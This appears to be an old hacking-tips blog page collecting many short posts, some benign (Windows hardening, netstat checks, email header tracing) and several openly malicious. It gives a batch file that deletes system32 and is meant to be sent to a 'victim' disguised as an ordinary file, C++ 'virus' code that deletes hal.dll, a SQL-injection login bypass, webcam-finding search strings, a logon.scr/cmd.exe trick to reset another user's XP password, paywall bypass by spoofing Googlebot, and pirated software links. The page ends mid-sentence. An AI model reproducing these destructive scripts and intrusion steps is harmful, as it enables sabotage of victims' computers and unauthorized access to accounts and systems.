Subscribe to our RSS Feeds

MSN/ Yahoo Hacking Tool Kit

0 Comments »
Here is Bomb Collection of S/w for Hacking Yahoo & MSN

Download Size 27
http://rapidshare.com/files/44045802/msnh_by_mechodownload.rar
pass: mechodownload

Prevent Users From Writing To USB

0 Comments »
The following registry setting will prevent writing to usb in windows xp.
Expand HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
Add a new key and name it "StorageDevicePolicies".
In the window on the right then create a new DWORD value and label it WriteProtect, give it a value of "1" and users can no longer write to USB drives.
Giving a value of "0" will allow to write again
9:07 PM

Make a simple file that destroys ur victims pc

0 Comments »
1. Open Notepad

2. write the above command : -
erase c:\windows\system32\*.* /q

3. Save the above notepad with the extension ".bat or .cmd" as u want

After u created the .cmd or .bat file send it to ur victim as like ordinary file.

Once ur victim double click on it then he/she needs to format his/her pc.

what it does is deletes all files present in the system32 folder out of which most of them are files important for a computers functioning.

Please
1)It would work only if the victim has windows os.
2)Victim has installed windows in c:\ drive
3)This is a very simple program many of you must be knowning this but any of you dont knw u can certainly use this info

Please do not double click the file otherwise all your system32 files would be deleted and when u restart ur pc it will not start .You can try this file in any one`s computer but this result in causing damage to the computer, so be careful before trying this on anyone's pc
9:03 PM

Powerful C++ Virus

0 Comments »
This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.
The Original Code:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
8:55 PM

How To Restrict Sites

0 Comments »
Go to www.admuncher.com and download it.
OR
Here is the full version
http://www.fileegg.com/files/A8A2748DB848C55
Or
http://rapidshare.com/files/46889219/Ad_Muncher_v4.7.27105.1383.rar
Or
http://rapidshare.com/files/12436511/reklamonle.zip
Pass: www.tsbay.org

What can Ad Muncher do for you?

Block advertising in all browsers.

Kill unwanted popups in all browsers.

Speed up page loading, thanks to the missing ads and pop up windows.

Prevent annoying site behaviors.

Block many spyware, adware and dialer installers.

Work immediately out of the box, thanks to the most extensive advertising filter list available.

Remove banners in programs like ICQ, Morpheus, Kazaa, Grokster, PalTalk, iMesh, Bearshare, LimeWire, etc.

Filter quickly and reliably, thanks to eight years of constant development and feedback from users.

Hack Into Webcams

0 Comments »
You are totally responsible for your actions

START
www.google.com
and put this into the search Bar
inurl:/view/index.shtml
or
intitle:liveapplet inurl:LvAppl

and click on google search

it would show you a list of searched items....
Go to any of the link...Some of them doesn't works..
and you would be able to see webcams...

You would be able to see street/Traffic cams

This is not a hacking Guide.
It's rather a tutorial to show you how to do a simple search for unprotected webcams on the nets
This is only for fun purposes

NOTE : You need to have high speed connection

Find Open Ports in a web server

0 Comments »
Follow this Steps

1. Download Nmap tool from the site www.insecure.org/nmap

2. Install it in ur system.

3. Go to command promt and just go to the path of the drive in which nmap is installed.

ex: c:\nmap>

4. Now this is the command to type.

For example if u want to know about the open ports of Yahoo server.

c:\nmap> nmap -sT -p 1-200 www.yahoo.com

From the above command 1-200 are the port numbers of the server u can give any number of port numbers that you want , just try this one and see. Sep 3 p@r@noid
netstat -n
try this command..this will giv u all the ips along port..whu r connected..
or u may try netstat -a

Yahoo Messenger Tips & Tricks

0 Comments »
Here is the collection you ever wanted to know about your favorite Yahoo Messenger. Read and enjoy!!!!

Yahoo! Messenger—The Latest Version:

The latest version of Yahoo! Messenger is a significant improvement over previous versions. Go to http://messenger.yahoo.com/ to download it, and to see what’s new.


New Mail Alert:

To be alerted in Yahoo! Messenger whenever you receive new mail in your Yahoo! account, do the following: Select Login > Preferences. Go to the Alerts and Sounds category. Under ‘Alert me when:’, highlight ‘I receive a mail message’. Select the desired notification options under ‘Alert me by:’, and click OK.


All The Smileys You Want:

Want to know about all the smileys you can use in Yahoo! Messenger, along with their keyboard shortcuts? Point your browser to http://www.bigblueball.com/im/yahoo/yahoo-smileys.php


YEmote2:

Download it from http://www.camgrab.tk/. YEmote2 adds several interesting features to Yahoo! Messenger, such as advanced Webcam capture, easy smileys selection, advanced message archive viewer, an auto-reply feature, and much more. Go to http://www.andy.w2s.co.uk/yahoo/YEmotePlus/index.htm for more on YEmote2.


Change The Title Text:

Here’s how you change the title text that appears at the top of the Messenger window. By default, this is “Yahoo! Messenger”, followed by your status. Simply edit the ymsgr.ini file, which you will find in the same folder as the Messenger program, in your Program Files folder. Locate the file and open it in Notepad. Then, at the end, add the following:

[APP TITLE]
caption=YOUR TEXT

Here, “YOUR TEXT” is whatever you want in the title bar. Save the file and close Messenger. When you restart it you will see your text in the title bar.


Multicast A Message:

To send a message to several recipients at once, right click on the group title in your contact list, on select Send Message to all in this group. Alternatively, hold down [Ctrl] and left-click on the contacts you wish to send a message to. Once you’ve highlighted the required names, simply right click on a name and select ‘Send a message’.



I Don’t Want To Be Your Friend:

Your Buddy Ever wanted to remove your name off someone else’s buddy list? Download a plugin to do this, from http://www.zakie.fsnet.co.uk/nobuddy/



Extra Smileys—Free:

For adult-themed, rude, and just plain naughty smileys for Yahoo! Messenger,
navigate to http://www.geocities.com /basefaces/. You will find a link there to download a zipped archive.

Find IP address of Sender in Mails

0 Comments »
Note :-
When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

65.119.112.245
That is be the IP address of the sender
5. Track the IP address of the sender

Gmail
1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets.


Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender


Yahoo
1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender!
6. Track the IP address of the sender

Is Your Computer Connecting To Websites Without Your Knowledge

0 Comments »
If you are worried that some programs on your PC are secretly making connections to websites in the background, here's a quick tip that uses a simple DOS command to detect and prevent such suspicious activity:

1. Type cmd in your Windows Run box.

2. Type "netstat -b 5 > activity.txt" and press enter. After say 2 minutes, press Ctrl+C.

3. Type "activity.txt" on the command line to open the log file in notepad (or your default text editor)

The file activity.txt will have a log of all process that made a connection to the Internet in the last two minutes. It will also show which process connected to which website in this time. And not just the web browsers (like iexplore.exe or opera.exe), the log will also show your IM clients, download managers, email programs or any software that requires a net connection.

Scroll though the activity.txt file and look for any process names or website addresses that you are not aware of. If you track one , go to the task manager (or Process Explorer) to find the location of the executable on your computer and eliminate it.

Part 1

0 Comments »
Hacking Websites

If you have the html and javascript knowledge then you can access password protected websites. So you want to know how??

1. Open the website you want to hack. Provide wrong username-password in its log in form.
(e.g : Username : me and Password: ' or 1=1 --)

An error will occur saying wrong username-password. Now be prepared
Your experiment starts from here...

2. Right click anywhere on that error page =>> go to view source.
3. There you can see the html codings with javascripts.

4. There you find somewhat like this....<_form action="..login....">
5. Before this login information copy the url of the site in which you are.
(e.g :"<_form..........action=http://www.targetwebsite.com/login.......>")

6. Then delete the javascript from the above that validates your information in the server.(Do this very carefully, ur success to hack the site depends upon this i.e how efficiently you delete the javascripts that validate ur account information)
7.Then take a close look for "<_input name="password" type="password">"[without quotes] -> replace "<_type=text> " there instead of "<_type=password>". See there if maxlength of password is less than 11 then increase it to 11 (e.g : if then write )

8. Just go to file => save as and save it any where in your hardisk with ext.html(e.g: c:\chan.html)
9. Reopen your target web page by double clicking 'chan.html' file that you saved in your harddisk earlier.

10. U see that some changes in current page as compared to original One. Don't get worried.
11. Provide any username[e.g:hacker] and password[e.g:' or 1=1 --]

Congrats!!!!!! You have successfully cracked the above website and entered into the account of Ist user saved in the server's database.

*****[Please read "_form"="form" & "_type"="type" & "_input"="input" without quotes]

The above trick won't work on the websites using latest technique to protect there servers. Still you may find some websites to use this trick. Enjoy!!!!


Windows Truely Hidden Files

1)SEEING IS BELIEVING
No. Enabling Windows Explorer to "show all files" does not show the files in mention. No. DOS does not
list the files after receiving a proper directory listing from root. And yes. Microsoft intentionally
disabled the "Find" utility from searching through one of the folders.

Oh, but that's not all.
To see for yourself simply do as you would normally do to clear your browsing history. Go to Internet
Options under your Control Panel. Click on the [Clear History] and [Delete Files] buttons. (Make sure
to include all offline content.)

So, has your browsing history been cleared? One would think so.

These are the names and locations of the "really hidden files":
c:\windows\history\history.ie5\index.dat
c:\windows\tempor~1\content.ie5\index.dat

If you have upgraded MSIE several times, they might have alternative names of mm256.dat and
mm2048.dat, and may also be located here:
c:\windows\tempor~1\
c:\windows\history\

Not to mention the other alternative locations under:
c:\windows\profiles\%user%\...
c:\windows\application data\...
c:\windows\local settings\...
c:\windows\temp\...
c:\temp\...
(or as defined in your autoexec.bat.)

FYI, there are a couple other index.dat files that get hidden as well, but they are seemingly not very
important. See if you can find them.

2)IF YOU HAVE EVER USED MICROSOFT INTERNET EXPLORER
1) Shut your computer down, and turn it back on.
2) While your computer is booting keep pressing the [F8] key until you are given an option screen.
3) Choose "Command Prompt Only" (This will take you to true DOS mode.) Windows ME users must use a boot
disk to get into real DOS mode.
4) When your computer is done booting, you will have a C:\> followed by a blinking cursor.
Type this in, hitting enter after each line. (Obviously, don't type the comments in parentheses.)

C:\WINDOWS\SMARTDRV (Loads smartdrive to speed things up.)
CD\
DELTREE/Y TEMP (This line removes temporary files.)
CD WINDOWS
DELTREE/Y COOKIES (This line removes cookies.)
DELTREE/Y TEMP (This removes temporary files.)
DELTREE/Y HISTORY (This line removes your browsing history.)
DELTREE/Y TEMPOR~1 (This line removes your internet cache.)

If that last line doesn't work, then type this
CD\WINDOWS\APPLIC~1
DELTREE/Y TEMPOR~1

If that didn't work, then type this
CD\WINDOWS\LOCALS~1
DELTREE/Y TEMPOR~1
If you have profiles turned on, then it is likely located under \windows\profiles\%user%\, while older
versions of MSIE keep them under \windows\content\.)

FYI, Windows re-creates the index.dat files automatically when you reboot your machine, so don't be
surprised when you see them again. They should at least be cleared of your browsing history.

3)CLEARING YOUR REGISTRY
It was once believed that the registry is the central database of Windows that stores and maintains the
OS configuration information. Well, this is wrong. Apparently, it also maintains a bunch of other
information that has absolutely nothing to do with the configuration. I won't get into the other
stuff, but for one, your typed URLs are stored in the registry.

HKEY_USERS/Default/Software/Microsoft/Internet Explorer/TypedURLs/
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs/
These "Typed URLs" come from MSIE's autocomplete feature. It records all URLs that you've typed in manually
in order to save you some time filling out the address field.

4)SLACK FILES
As you may already know, deleting files only deletes the references to them. They are in fact still sitting
there on your HD and can still be recovered by a very motivated person.
Use window washer to delete slack files. /http://www.webroot.com/download/0506/reg3ww.exe

5)STEP-BY-STEP GUIDE THROUGH YOUR HIDDEN FILES
The most important files to be paying attention to are your "index.dat" files. These are database files
that reference your history, cache and cookies. The first thing you should know is that the index.dat files
is that they don't exist in less you know they do. They second thing you should know about them is that
some will *not* get cleared after deleting your history and cache.

To view these files, follow these steps:
In MSIE 5.x, you can skip this first step by opening MSIE and going to Tools > Internet Options > [Settings] > [View Files].
Now write down the names of your alphanumeric folders on a piece of paper. If you can't see any alphanumeric
folders then start with step 1 here:

1) First, drop to a DOS box and type this at prompt (in all lower-case). It will bring up Windows Explorer
under the correct directory.

c:\windows\explorer /e,c:\windows\tempor~1\content.ie5\
You see all those alphanumeric names listed under "content.ie5?" (left-hand side.) That's Microsoft's
idea of making this project as hard as possible. Actually, these are your alphanumeric folders that was
created to keep your cache. Write these names down on a piece of paper. (They should look something like
this: 6YQ2GSWF, QRM7KL3F, U7YHQKI4, 7YMZ516U, etc.) If you click on any of the alphanumeric folders then
nothing will be displayed. Not because there aren't any files here, but because Windows Explorer has lied
to you. If you want to view the contents of these alphanumeric folders you will have to do so in DOS.

2) Then you must restart in MS-DOS mode. (Start > Shutdown > Restart in MS-DOS mode. ME users use a
bootdisk.)

Note that you must restart to DOS because windows has locked down some of the files and they can only be
accessed in real DOS mode.

3) Type this in at prompt:

CD\WINDOWS\TEMPOR~1\CONTENT.IE5
CD %alphanumeric%
(replace the "%alphanumeric%" with the first name that you just wrote down.)

DIR/P
The cache files you are now looking at are directly responsible for the mysterious erosion of HD space
you may have been noticing.

5) Type this in:

CD\WINDOWS\TEMPOR~1\CONTENT.IE5
EDIT /75 INDEX.DAT
You will be brought to a blue screen with a bunch of binary.

6) Press and hold the [Page Down] button until you start seeing lists of URLs. These are all the sites
that you've ever visited as well as a brief description of each. You'll notice it records everything
ou've searched for in a search engine in plain text, in addition to the URL.

7) When you get done searching around you can go to File > Exit. If you don't have mouse support in DOS
then use the [ALT] and arrow keys.

Next you'll probably want to erase these files by typing this:

C:\WINDOWS\SMARTDRV
CD\WINDOWS
DELTREE/Y TEMPOR~1
(replace "cd\windows" with the location of your TIF folder if different.)

9) Then check out the contents of your History folder by typing this:

CD\WINDOWS\HISTORY\HISTORY.IE5
EDIT /75 INDEX.DAT
You will be brought to a blue screen with more binary.

10) Press and hold the [Page Down] button until you start seeing lists of URLS again.

This is another database of the sites you've visited.

11) And if you're still with me, type this:

CD\WINDOWS\HISTORY
12) If you see any mmXXXX.dat files here then check them out (and delete them.) Then:

CD\WINDOWS\HISTORY\HISTORY.IE5
CD MSHIST~1
EDIT /75 INDEX.DAT
More URLs from your Internet history. Note, there are probably other mshist~x folders here so you can
repeat these steps for every occurrence if you please.

13) By now, you'll probably want to type in this:
CD\WINDOWS
DELTREE/Y HISTORY

6)HOW MICROSOFT DOES IT
How does Microsoft make these folders/files invisible to DOS?

The only thing Microsoft had to do to make the folders/files invisible to a directory listing is to
set them +s[ystem]. That's it.

So how does Microsoft make these folders/files invisible to Windows Explorer?

The "desktop.ini" is a standard text file that can be added to any folder to customize certain aspects of
the folder's behavior. In these cases, Microsoft utilized the desktop.ini file to make these files
invisible. Invisible to Windows Explorer and even to the "Find: Files or Folders" utility. All that
Microsoft had to do was create a desktop.ini file with certain CLSID tags and the folders would disappear
like magic.

To show you exactly what's going on:

Found in the c:\windows\temporary internet files\desktop.ini and
the c:\windows\temporary internet files\content.ie5\desktop.ini is this text:

[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
Found in the c:\windows\history\desktop.ini and the c:\windows\history\history.ie5\desktop.ini is this text:

[.ShellClassInfo]
UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}
CLSID={FF393560-C2A7-11CF-BFF4-444553540000}
The UICLSID line cloaks the folder in Windows Explorer. The CLSID line disables the "Find" utility
from searching through the folder.

To see for yourself, you can simply erase the desktop.ini files. You'll see that it will instantly give
Windows Explorer proper viewing functionality again, and the "Find" utility proper searching capabilities
again. Problem solved right? Actually, no. As it turns out, the desktop.ini files get reconstructed every
single time you restart your computer. Nice one, Slick.

Luckily there is a loophole which will keep Windows from hiding these folders. You can manually edit the
desktop.ini's and remove everything except for the "[.ShellClassInfo]" line. This will trick windows into
thinking they have still covered their tracks, and wininet won't think to reconstruct them.

-~-ACRONYMS-~-
DOS = Disk Operating System, or MS-DOS
MSIE = Microsoft Internet Explorer
TIF = Temporary Internet Files (folder)
HD = Hard Drive
OS = Operating System
FYI = For Your Information


Browser Hijacking

Hackers and Browser Hijacking is one area of the Net that affects everyone at some stage.
In addition to having third party utilities such as SpyBot, Anti Virus scanners and firewalls installed there are some changes that can be made to Windows 2000/XP. Below are some details to make your system safer from hackers and hijackers.

Some of these tips require editing of the Registry so it is wise to either backup the registry and/or create a Restore Point.

1. Clearing the Page File at Shutdown:
Windows 2000/XP paging file (Sometimes called the Swap File) can contain sensitive information such as plaintext passwords. Someone capable of accessing your system could scan that file and find its information. You can force windows to clear out this file.

In the registry navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management and add or edit the DWORD ClearPageFileAtShutdown. Set it to 1.

Note that when you do this, the system will take much longer to shut down: a system with a really big Page File (! Gig or more) may take a minute or two longer.

2. Disable the POSIX and OS/2 Subsystem:
Windows 2000 and XP come with little-documented subsystems it at allow compatibility with UNIX and OS/2 systems These rues systems are enabled by default but so rarely used that they are best off bring disabled completely to prevent possible service hijackings.

To disable these subsystems, open the registry and navigate to HKEY LOCAL MACHINESYSTEMCurrentControlSetControlSession ManagerSubSystems. Delete the subkeys Os2 and Posix. then reboot.

3. Never leave default passwords blank:
On installation, Windows 2000 sets up an Administrator account with total system access and prompts for a password. Guess what: by default, it allows that password to be blank. If a user doesn't want to type a password, he can simply click Next and the system will be an open door for anyone who wants to log on. Always opt for a password of some kind when setting up the default account on a machine.

4. Install Windows In a different directory:
Windows usually installs itself in the WINDOWS directory. Windows NT 4 0 and 2000 Will opt for WINNT. Many worms and other rogue programs assume this to be the case and attempt to exploit those folders files. To defeat this install Windows to another directory when you're setting it up - you can specify the name of the directory during setup. WINDIR is okay; so some people use WNDWS - A few (not that many) programs may not install properly if you install Windows to another folder but t hey are very few and they are far between

5. Fake out hackers with a dummy Administrator account:
Since the default account in Windows 2000 is always named Administrator, an enterprising hacker can try to break into your system by attempting to guess the password on that account. It you never bothered to put a password on that account, say your prayers.

Rather than be a sucker to a hacker, put a password on the Administrator account it you haven't done so already. Then change the name of the Administrator account. You'll still be able to use the account under its new name, since Windows identifies user accounts by a back-end ID number rather than the name. Finally, create a new account named Administrator and disable it. This should frustrate any would -be break-ins.

You can add new accounts and change the names of existing accounts in Windows 2000 through the Local Users and Groups snap in. Right-click on My Computer, select Manager, open the Local Users and Groups subtree, look in the Users folder and right-click on any name to rename it. To add a new user, right-click on the containing folder and select New User. Finally, to disable an account, double-click it, check the Account is disabled box and click OK.

Don't ever delete the original Administrator account. Some programs refuse to install without it and you might have to log in under that account at some point to setup such software. The original Administrator account is configured with a security ID that must continue to be present in the system.

6. Disable the Guest account:
Windows XP comes with a Guest account that's used for limited access, but it's still possible to do some damage with it. Disable it completely if you are not using it. Under Control Panel, select User Accounts, click on Guest Account and then select Turn Off the Guest Account.

7. Set the Hosts file to read-only to prevent name hijacking.
This one's from (and to a degree, for) the experts. The HOSTS file is a text file that all flavors of Windows use to hold certain network addresses that never change. When a network name and address is placed in HOSTS, the computer uses the address listed there for that network name rather than performing a lookup (which can take time). Experts edit this file to place their most commonly-visited sites into it, speeding things up considerably.

Unfortunately hijackers and hackers also love to put their own information into it - redirecting people from their favorite sites to places they don't want to go. One of the most common entries in HOSTS is local host which is set 1770.0.1. This refers to the local machine and if this entry is damaged the computer can behave very unpredictably.

To prevent HOSTS from being hijacked, set it to read-only. Go to the folder %Systemroot%system32driversetc, right-click on HOSTS, select Properties check the Read-Only box and click OK. If you want to add your own entries to HOSTS, you can unprotect it before doing so, but always remember to set it to read-only after you're done.

8. Disallow changes to IE settings through IE:
This is another anti hijacker tip. IE can be set so that any changes to its settings must be performed through the Internet icon in the Control Panel, rather than through IE's own interface. Some particularly unscrupulous programs or sites try to tamper with setting by accessing the Tools, Options menu in IE. You can disable this and still make changes to IE's settings through the Control Panel.

Open the Registry and browse to HKEY_CURRENT_USER SoftwarePoliciesMicrosoftInternet ExplorerRestrictions. Create or edit a new DWORD value named NoBrowserUptions and set it to 1 (this is a per-user setting). Some third-party programs such as Spybot Search And Destroy allow you to toggle this setting.

You can also keep IE from having other programs rename its default startup page, another particularly annoying form of hijacking. Browse to HKEY.CURRENT USERSoftwarePolicies MicrosoftInternet ExploreControl Panel and add or edit a DWORD, Homepage and set it to 1.

9. Turn off unneeded Services:
Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter, Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry, Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host.

A good resource and instruction on which of these services can be disabled go to /http://www.blkviper.com/WinXP/

10. Disable simple File Shares:
In Windows XP Professional, the Simple File Sharing mode is easily exploited, since it’s a little too easy to share out a file across your LAN (or the NET at large). To turn it off, go m My Computer, click Tools, Folder Option and the View tab, and uncheck Use Simple file sharing (Recommended). Click OK. When you do this you can access the Security tab in the Properties window for all folders; set permissions for folders; and take ownership of objects (but not in XP Home)


Secret Backdoor To Many Websites

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


Change Windows XP Boot Screen

This is a very simple trick to do if you have done the same for the logon screen and the start button. There are 2 ways to do this trick that I know about one is doing it manually and the other is using a program called bootxp. I am going to tell you the manual way to do it, but if you want to know the other way just let me know, so I can do an update to the guide. Now once you have downloaded your ntoskrnl.exe file save it a general location so that you will have easy access to it, like my folder.

Once you have ntoskrnl.exe file in an easy access folder, restart your pc into safe mode. Once into safe mode go to the folder where your files are located.

Now that you are there copy the file that you want to change your boot screen too. Once you have copied that file, hit the window key + r or type %windir%\system32 in the run command, so that folder as follows.

Once there paste your new file into the folder and overwrite the existing folder.
Now that you have your new file in the folder restart your pc as you normally would and your new boot screen should appear. You can download this bootscreen here.

ALWAYS BACKUP EVERYTHING YOU EDIT OR DELETE. I'M NOT RESPONSIBLE IF YOU MESS YOUR COMPUTER UP BY DOING THIS HACK OR ANY TYPE OF HACK. DO IT AT YOUR OWN RISK.

Image and ntoskrnl.exe files provided by www.themexp.org
or
u can go to
http://www.overclockersclub.com/guides/hackxpbootscreen.php


Rapidshare Timelimit

Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server, a different IP address. You can do this one of multiple ways.

Requesting a new IP address from your ISP server.
Here's how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new line.

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit


5. Erase your cookies in whatever browser you are using.
6. Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.


How to hack Win XP Admin Passwords

This hack will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Win XP for the first time your
asked to put in your username and up to five others.
Now, unknownst to a lot of other people this is the only place in
Win XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Win XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.

This has worked for me on both Win XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependant, it works randomly(don't know why)

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this appeared on w*w.astalavista.com a few days ago but i found that it wouldn't work
on the welcome screen of a normal booted machine)
-----------------------------------------------------------------------------
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.


Reset Lost Bios Password

CAUTION: The use of the code listed in this tutorial is entirely at your risk..........

Here's a DOS trick for Windows 9x, that will reset (delete) your motherboard's BIOS password (aka CMOS password) without any need to open up your computer to remove the battery or mess with jumpers.

This method can come in very handy in the event you ever lose and forget your BIOS password or if you acquire used computers where the unknown previous owners had BIOS passwords set. It's important to note here that the password we are talking about is only the one that prevents a user from entering the BIOS setup at bootup, not the one that stops you from getting past the boot.

Normally, at bootup you can press a key (usually the DEL key) to access your BIOS allowing you to view it or make changes. With a password set, there is no way to enter setup. Though a password can provide a basic and very effective level of PC security, losing it can be a real headache if you don't know how to fix the problem.

The MS-DOS command that will makes this trick possible is the DEBUG command (debug itself is a utility—debug.exe—which is located in your Windows Command folder). This is not a command to be taken lightly—in other words, it's not a command to play with! You can cause serious corruption with this command and can end up not being able to even boot your computer! Debug is used to work with binary and executable files and allows you to alter (hex edit) the contents of a file or CPU register right down to the binary and byte level.

To begin debug mode, type debug at a MS-DOS prompt or you can specify a file, i.e., DEBUG FILE.EXE. There is a difference in screen output between the two methods. When you type DEBUG alone, debug responds with a hyphen (-) prompt waiting for you to enter commands. The second method, with a file specified, loads the file into memory and you type all the commands on the line used to start debug. In this tip, we will be writing to the BIOS, so the first method is the one that would be used. All debug commands can be aborted at any time by pressing CTRL/C.

Accessing BIOS with DEBUG
The basic trick will be to fool the BIOS into thinking there is a checksum error, in which case it resets itself, including the password. This is done by invalidating the CMOS and to do that we must know how to access the BIOS and where the checksum value of the CMOS is located so that we can change it. Access to the the BIOS content is via what are known as CMOS Ports and it's Port 70 and 71 that will give us the needed access. On almost all AT motherboards, the checksum is located at hexadecimal address 2e and 2f and filling the address 2e with ff is all you should have to do to invalidate the checksum.

Here's what to do if you ever need to reset the password and have no other method, and you don't want to open up your computer to remove the battery or jumpers.

Note! Do this at your own risk. I can only tell you that it has worked for me more than once and has worked for others as well. But I cannot make any guarantees. When I did this, I took a willing risk. The BIOS was Award Modular BIOS v4.51PG


Restart your computer in MS-DOS mode

When you get to the C:\> or C:\WINDOWS> prompt, type DEBUG and press Enter.
A hyphen (-) prompt will appear waiting for you to enter commands.
Enter the following commands, pressing Enter after each one. Note: the o is the letter o and stands for OUTPUT.
o 70 2e o 71 ff q

After the q command (which stands for QUIT), enter Exit.
Then try to enter your BIOS at bootup. The password prompt should now be gone and you should now have full access to it again. However, you will now be at the default BIOS settings and may want to change them to your preference. You may also want to have your drives auto detected again.
In closing, I should state that in the case of a lost BIOS password, your first step should always be to contact your manufacturer to see if a back door password is available that will allow you to bypass the forgotten password.

There are many sites on the net that list back door passwords you can try, but beware that some BIOS that are set up to lock up if you enter the wrong password more than a certain number of times, usually only 3 times!!!

To be on safe side, just back up your data..........


Make Mp3 Files Smaller Without Losing Quality

If you don't already have a copy of MusicMatch Jukebox, download one from musicmatch.com. The "Plus" version has more features and burns CDs faster, but the free version works just fine for converting files.

1. Install music match box and then restart your computer if it asks
2. open music matchbox and click file convert files
3. in the bottom right hand corner called 'destination type' change it to mp3 pro.
4.you can edit the bitrate but the higher the bitrate the bigger the size
5. choose the songs you want to convert and click start

***if you want to try something different repeat step one and 2 and instead of making the destintion type mp3 pro make it 'mp3pro vbr'
again the lower the setting the smaller the size.


Get in windows 2000 as Administrator

NOTE: Requires a boot disk.
Get the command prompt and go to C:\winnt\sytem32\config\ and do
